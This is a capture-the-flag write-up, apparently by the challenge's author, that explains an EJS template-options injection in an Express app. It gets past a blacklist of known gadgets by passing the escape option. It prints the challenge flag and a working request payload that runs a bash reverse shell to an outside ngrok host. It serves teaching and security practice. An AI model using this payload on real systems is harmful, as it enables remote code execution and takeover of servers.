Author: zeyu2001
Category: Web
Flag: SEE{0h_n0_h0w_d1d_y0u_ch4ng3_my_0pt10ns}
My first JavaScript project.
Easy
docker-compose up -d
EJS lets you pass in options via the data object. This is documented behavior.
Normally, only the following relatively harmless options are allowed to be passed in the data object:
var _OPTS_PASSABLE_WITH_DATA = ['delimiter', 'scope', 'context', 'debug', 'compileDebug',
'client', '_with', 'rmWhitespace', 'strict', 'filename', 'async'];
// We don't allow 'cache' option to be passed in the data obj for
// the normal `render` call, but this is where Express 2 & 3 put it
// so we make an exception for `renderFile`
var _OPTS_PASSABLE_WITH_DATA_EXPRESS = _OPTS_PASSABLE_WITH_DATA.concat('cache');
But from the above code segment, settings['view options']
can be used to pass any arbitrary option to EJS.
This can be chained with an RCE gadget (similar to the ones used to gain RCE after prototype pollution). However, most of the known RCE gadgets from online blogs are blacklisted:
const BLACKLIST = [
"outputFunctionName",
"escapeFunction",
"localsName",
"destructuredLocals"
]
It is known that opts.escapeFunction
can be used as an RCE gadget here.
However, this option can also alternatively be passed via opts.escape
.
options.escapeFunction = opts.escape || opts.escapeFunction || utils.escapeXML;
Payload (URL decoded):
GET /greet?name=x&settings[view options][escape]=JSON.stringify;process.mainModule.require('child_process').execSync('bash -c "bash -i >& /dev/tcp/8.tcp.ngrok.io/16180 0>&1"')&settings[view options][client]=1&font=x&fontSize=x HTTP/1.1
Most participants would have noticed this GitHub issue during the competition (created 2 weeks before the competition).
I wrote this challenge way back in March 2023, and the original idea of this challenge was to find the view options
sink. This was not documented anywhere (as far as I can tell) at that time.
I guess I was too late to the party. :(
Anyway, after seeing the issue, I added the escapeFunction
blacklist so that the challenge would not be too easy. At the very least, solvers would have to read the source to find that escapeFunction
can also be set through opts.escape
.